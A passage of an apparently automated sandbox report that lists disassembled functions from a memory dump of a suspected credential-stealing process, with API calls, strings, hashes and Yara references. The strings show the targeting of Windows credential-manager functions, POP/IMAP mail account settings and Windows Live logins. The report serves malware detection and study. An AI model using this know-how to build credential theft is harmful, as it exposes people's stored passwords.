                                                                                                                                                                                  • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll), ref: 004045E8
                                                                                                                                                                                • wcslen.MSVCRT ref: 0040874A
                                                                                                                                                                                • wcsncmp.MSVCRT ref: 00408794
                                                                                                                                                                                • memset.MSVCRT ref: 0040882A
                                                                                                                                                                                • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?), ref: 00408849
                                                                                                                                                                                • wcschr.MSVCRT ref: 0040889F
                                                                                                                                                                                • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004088CB
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FreeLibraryLoadLocalmemcpymemsetwcschrwcslenwcsncmp
                                                                                                                                                                                • String ID: J$Microsoft_WinInet
                                                                                                                                                                                • API String ID: 893589435-260894208
                                                                                                                                                                                • Opcode ID: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                                                                                                                                                                                • Instruction ID: 28b95496509cbb6d8c3a882eeb8be19e6e579a4afcb86d24d1cb248b0f397b1b
                                                                                                                                                                                • Opcode Fuzzy Hash: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                                                                                                                                                                                • Instruction Fuzzy Hash: 9E5127B16083469FD710EF65C981A5BB7E8FF89304F40492EF998D3251EB38E944CB5A
                                                                                                                                                                                Function 00406C7C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarystringwindowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • LoadLibraryExA.KERNEL32(netmsg.dll,00000000,00000002), ref: 00406CA1
                                                                                                                                                                                • FormatMessageA.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000), ref: 00406CBF
                                                                                                                                                                                • strlen.MSVCRT ref: 00406CCC
                                                                                                                                                                                • _mbscpy.MSVCRT(?,?,?,00000400,?,00000000,00000000), ref: 00406CDC
                                                                                                                                                                                • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00406CE6
                                                                                                                                                                                • _mbscpy.MSVCRT(?,Unknown Error,?,00000400,?,00000000,00000000), ref: 00406CF6
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _mbscpy$FormatFreeLibraryLoadLocalMessagestrlen
                                                                                                                                                                                • String ID: Unknown Error$netmsg.dll
                                                                                                                                                                                • API String ID: 2881943006-572158859
                                                                                                                                                                                • Opcode ID: 3ddff6ca73234fcaad2cc89b351310259c35e619cc53eac77f1216a830b0495f
                                                                                                                                                                                • Instruction ID: bcf62a4d61e6eba693f00c41f459c7331aa1a44f371262b110411e5fdf5e0d86
                                                                                                                                                                                • Opcode Fuzzy Hash: 3ddff6ca73234fcaad2cc89b351310259c35e619cc53eac77f1216a830b0495f
                                                                                                                                                                                • Instruction Fuzzy Hash: B201DF31609114BBF7051B61EE46F9FBA6CEF49790F20002AF607B1191DA78AE10969C
                                                                                                                                                                                Function 00410034 Relevance: 14.0, APIs: 2, Strings: 6, Instructions: 48libraryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • LoadLibraryA.KERNEL32(psapi.dll), ref: 00410047
                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Library$FreeLoad
                                                                                                                                                                                • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                                                                                                                                                • API String ID: 534179979-232097475
                                                                                                                                                                                • Opcode ID: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                                                                                                                • Instruction ID: dd2e46225b8bbf3860c07ad768741e6abff990e6b314fd3472572f6830733abf
                                                                                                                                                                                • Opcode Fuzzy Hash: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                                                                                                                • Instruction Fuzzy Hash: 6E0144399017426AE7226B29BC51B6B3EB89B4DB01B15007BE400E2352DBFCD8C0CF5E
                                                                                                                                                                                Function 0040966C Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                                                                                                                • _mbscpy.MSVCRT(0045A448,00000000,?,00000000,0040972B,00000000,?,00000000,00000104), ref: 00409686
                                                                                                                                                                                • _mbscpy.MSVCRT(0045A550,general,0045A448,00000000,?,00000000,0040972B,00000000,?,00000000,00000104), ref: 00409696
                                                                                                                                                                                • GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
                                                                                                                                                                                  • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: PrivateProfile_mbscpy$AttributesFileString
                                                                                                                                                                                • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                                                                                • API String ID: 888011440-2039793938
                                                                                                                                                                                • Opcode ID: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                                                                                                                                                                                • Instruction ID: 35163425d10a67bbe8c9c36fe52ba00322d2719519e04c12929343b9a05e3383
                                                                                                                                                                                • Opcode Fuzzy Hash: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                                                                                                                                                                                • Instruction Fuzzy Hash: 51F09621EC021636EA113A315C47F6E75148F91B16F1546BBBD057B2C3EA6C8D21819F
                                                                                                                                                                                Function 0042E8E8 Relevance: 13.8, APIs: 2, Strings: 7, Instructions: 272COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                • too many attached databases - max %d, xrefs: 0042E951
                                                                                                                                                                                • cannot ATTACH database within transaction, xrefs: 0042E966
                                                                                                                                                                                • unable to open database: %s, xrefs: 0042EBD6
                                                                                                                                                                                • attached databases must use the same text encoding as main database, xrefs: 0042EAE6
                                                                                                                                                                                • database is already attached, xrefs: 0042EA97
                                                                                                                                                                                • database %s is already in use, xrefs: 0042E9CE
                                                                                                                                                                                • out of memory, xrefs: 0042EBEF
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpymemset
                                                                                                                                                                                • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                                                                                                • API String ID: 1297977491-2001300268
                                                                                                                                                                                • Opcode ID: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                                                                                                                                                                                • Instruction ID: 706ac67067754653a22c48b2dfc2d31ecc94a00d4abf430cd75191e688397775
                                                                                                                                                                                • Opcode Fuzzy Hash: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                                                                                                                                                                                • Instruction Fuzzy Hash: E5A1BFB16083119FD720DF26E441B1BBBE0BF84314F54491FF8998B252D778E989CB5A
                                                                                                                                                                                Function 00409C1C Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 157COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A3E
                                                                                                                                                                                  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A4C
                                                                                                                                                                                  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A5D
                                                                                                                                                                                  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A74
                                                                                                                                                                                  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A7D
                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 00409C53
                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 00409C6F
                                                                                                                                                                                • memcpy.MSVCRT(?,0wE,00000014), ref: 00409C97
                                                                                                                                                                                • memcpy.MSVCRT(?,0wE,00000010,?,0wE,00000014), ref: 00409CB4
                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 00409D3D
                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 00409D47
                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 00409D7F
                                                                                                                                                                                  • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                                                                                                                                  • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
                                                                                                                                                                                  • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
                                                                                                                                                                                  • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ??2@??3@$memcpy$LoadString_mbscpystrlen
                                                                                                                                                                                • String ID: 0wE$d
                                                                                                                                                                                • API String ID: 2915808112-1552800882
                                                                                                                                                                                • Opcode ID: 5a88f189346dd5be2aec3c73a416be20eab0e6d765e6f29cccd2d89947c5fd10
                                                                                                                                                                                • Instruction ID: 1be057752684aea17f507b8882d339e9c418a93e0b7bc1648df0d3b0eb18cc96
                                                                                                                                                                                • Opcode Fuzzy Hash: 5a88f189346dd5be2aec3c73a416be20eab0e6d765e6f29cccd2d89947c5fd10
                                                                                                                                                                                • Instruction Fuzzy Hash: B4513B71A01704AFEB24DF29D542B9AB7E4FF88314F10852EE55ADB382DB74E940CB44
                                                                                                                                                                                Function 00403166 Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 100stringCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                                                                                                                                                                                • strchr.MSVCRT ref: 0040327B
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: PrivateProfileStringstrchr
                                                                                                                                                                                • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                                                                                                                                                • API String ID: 1348940319-1729847305
                                                                                                                                                                                • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                                                                                                                • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                                                                                                                                                                                • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                                                                                                                • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                                                                                                                                                                                Function 00411004 Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 60COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • memcpy.MSVCRT(?,&quot;,00000006,?,?,00000000,0040ABBD,?,?), ref: 00411034
                                                                                                                                                                                • memcpy.MSVCRT(?,&amp;,00000005,?,?,00000000,0040ABBD,?,?), ref: 0041105A
                                                                                                                                                                                • memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                                • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                                                                                • API String ID: 3510742995-3273207271
                                                                                                                                                                                • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                                                                                                                • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                                                                                                                                                                                • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                                                                                                                • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                                                                                                                                                                                Function 00405E69 Relevance: 13.6, APIs: 9, Instructions: 58windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 00405E80
                                                                                                                                                                                • GetWindow.USER32(?,00000005), ref: 00405E98
                                                                                                                                                                                • GetWindow.USER32(00000000), ref: 00405E9B
                                                                                                                                                                                  • Part of subcall function 004015B0: GetWindowRect.USER32(?,?), ref: 004015BF
                                                                                                                                                                                  • Part of subcall function 004015B0: MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004015DA
                                                                                                                                                                                • GetWindow.USER32(00000000,00000002), ref: 00405EA7
                                                                                                                                                                                • GetDlgItem.USER32(?,000003ED), ref: 00405EBE
                                                                                                                                                                                • GetDlgItem.USER32(?,00000000), ref: 00405ED0
                                                                                                                                                                                • GetDlgItem.USER32(?,00000000), ref: 00405EE2
                                                                                                                                                                                • GetDlgItem.USER32(?,000003ED), ref: 00405EF0
                                                                                                                                                                                • SetFocus.USER32(00000000), ref: 00405EF3
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Window$Item$Rect$ClientFocusPoints
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2432066023-0
                                                                                                                                                                                • Opcode ID: 3ed905a81be40d412dce536e6719fe7cdedab364c991d1c90f2ea44b29e4445c
                                                                                                                                                                                • Instruction ID: 6786727c0aa7fef6bca0c81d499308ec00879f235530f9e7c86c655f771e1d73
                                                                                                                                                                                • Opcode Fuzzy Hash: 3ed905a81be40d412dce536e6719fe7cdedab364c991d1c90f2ea44b29e4445c
                                                                                                                                                                                • Instruction Fuzzy Hash: B801A571500305EFDB116F76DC8AF6BBFACEF81755F05442AB4049B191CBB8E8018A28
                                                                                                                                                                                Function 0040F96C Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 133COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                                                                                                                • memset.MSVCRT ref: 0040FA1E
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040FA35
                                                                                                                                                                                • _strnicmp.MSVCRT ref: 0040FA4F
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA7B
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA9B
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ByteCharMultiWide$Version_strnicmpmemset
                                                                                                                                                                                • String ID: WindowsLive:name=*$windowslive:name=
                                                                                                                                                                                • API String ID: 945165440-3589380929
                                                                                                                                                                                • Opcode ID: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                                                                                                                                                                • Instruction ID: 67e4bc7d9cc92e77f49167b45697c8bd07ba2e516c4687fa62adfbc1007618b4
                                                                                                                                                                                • Opcode Fuzzy Hash: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                                                                                                                                                                • Instruction Fuzzy Hash: D1418BB1508345AFC720DF24D88496BB7ECEB85304F004A3EF99AA3691D738DD48CB66
                                                                                                                                                                                Function 004094A2 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 004094C8
                                                                                                                                                                                • GetDlgCtrlID.USER32(?), ref: 004094D3
                                                                                                                                                                                • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                                                                                                                                                                                • memset.MSVCRT ref: 0040950C
                                                                                                                                                                                • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                                                                                                                                                                                • _strcmpi.MSVCRT ref: 00409531
                                                                                                                                                                                  • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                                                                                                                                                                • String ID: sysdatetimepick32
                                                                                                                                                                                • API String ID: 3411445237-4169760276
                                                                                                                                                                                • Opcode ID: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                                                                                                                                                                                • Instruction ID: 275a188ed2e8c4d5dd974f468a7d06fe6df33147f8fd952053c2ef98a917a35b
                                                                                                                                                                                • Opcode Fuzzy Hash: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                                                                                                                                                                                • Instruction Fuzzy Hash: 2D11E773C051297EEB129754DC81EEF7BACEF5A315F0400B6FA08E2151E674DE848A64
                                                                                                                                                                                Function 0040FFB0 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 44COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040FE20), ref: 0040FFBF
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: HandleModule
                                                                                                                                                                                • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                                                                                • API String ID: 4139908857-3953557276
                                                                                                                                                                                • Opcode ID: 8e4e43fab517c96f9a2ff6d8ac63dfc53d669fa3acf3b21c89ab0adfd667092d
                                                                                                                                                                                • Instruction ID: ef187524dc85a124578c70d9a5034bc1ef4a482c247f5fceb27d5c4ea416582d
                                                                                                                                                                                • Opcode Fuzzy Hash: 8e4e43fab517c96f9a2ff6d8ac63dfc53d669fa3acf3b21c89ab0adfd667092d
                                                                                                                                                                                • Instruction Fuzzy Hash: 15F06D30A007566AA7234B297C91BAB2EB89B4DB81715003BA400E6251DBE8D8C1CA6D
                                                                                                                                                                                Function 004045DB Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 41libraryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                                                                                                                                                                                • LoadLibraryA.KERNEL32(advapi32.dll), ref: 004045E8
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Library$FreeLoad
                                                                                                                                                                                • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                                                                                                                                                • API String ID: 534179979-4258758744
                                                                                                                                                                                • Opcode ID: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                                                                                                                                • Instruction ID: 2cc24b9197253aa622afa6144fd2e07652f81762edb29d5cb7a2b3ace442d85c
                                                                                                                                                                                • Opcode Fuzzy Hash: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                                                                                                                                • Instruction Fuzzy Hash: 12014FB49017009ADB30AF75C809B46BBE0EFA9704F214C2FE295A3691E77ED445CF88
                                                                                                                                                                                Function 00405983 Relevance: 12.2, APIs: 8, Instructions: 200windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405A31
                                                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405A47
                                                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405A5F
                                                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405A7A
                                                                                                                                                                                • EndDialog.USER32(?,00000002), ref: 00405A96
                                                                                                                                                                                • EndDialog.USER32(?,00000001), ref: 00405AA9
                                                                                                                                                                                  • Part of subcall function 00405737: GetDlgItem.USER32(?,000003E9), ref: 00405745
                                                                                                                                                                                  • Part of subcall function 00405737: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 0040575A
                                                                                                                                                                                  • Part of subcall function 00405737: SendMessageA.USER32(?,00001032,00000000,00000000), ref: 00405776
                                                                                                                                                                                • SendDlgItemMessageA.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405AC1
                                                                                                                                                                                • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405BC9
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Item$DialogMessageSend
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2485852401-0
                                                                                                                                                                                • Opcode ID: ec9303a4946bc0e02ff46f830e49cd5227634f9872e1f7ef617901a07ad17536
                                                                                                                                                                                • Instruction ID: 49f8b46d81ffaaf96d74304be2fa091063820ac2067ea90d1efd1f4607779086
                                                                                                                                                                                • Opcode Fuzzy Hash: ec9303a4946bc0e02ff46f830e49cd5227634f9872e1f7ef617901a07ad17536
                                                                                                                                                                                • Instruction Fuzzy Hash: BC619230600A45ABEB21AF65C8C5A2BB7A5EF40718F04C23BF515A76D1E778EA50CF58
                                                                                                                                                                                Function 0040B38F Relevance: 12.1, APIs: 8, Instructions: 108windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                                                                                                                                                                                • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                                                                                                                                                                                • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                                                                                                                                                                                • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                                                                                                                                                                                • GetSysColor.USER32(0000000F), ref: 0040B472
                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 0040B4A6
                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 0040B4A9
                                                                                                                                                                                • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessageSend$DeleteImageLoadObject$Color
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3642520215-0
                                                                                                                                                                                • Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                                                                                                                • Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
                                                                                                                                                                                • Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                                                                                                                • Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
                                                                                                                                                                                Function 00405BD9 Relevance: 12.1, APIs: 8, Instructions: 100windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2313361498-0
                                                                                                                                                                                • Opcode ID: c0fd86ac5231b126ca71dbcda0134e8e863c460558ef4c97bad657530ca58ccb
                                                                                                                                                                                • Instruction ID: 76b7db47255e00c5a16d586f34bfaf53fe76d4163934589152c5d70c184cfcdd
                                                                                                                                                                                • Opcode Fuzzy Hash: c0fd86ac5231b126ca71dbcda0134e8e863c460558ef4c97bad657530ca58ccb
                                                                                                                                                                                • Instruction Fuzzy Hash: AF31B3B1500605AFEB24AF69CC85E2AF7A8FF44354B00853FF55AE76A1D778EC408B94
                                                                                                                                                                                Function 0040BB14 Relevance: 12.1, APIs: 8, Instructions: 76COMMON
                                                                                                                                                                                Download Yara Rule
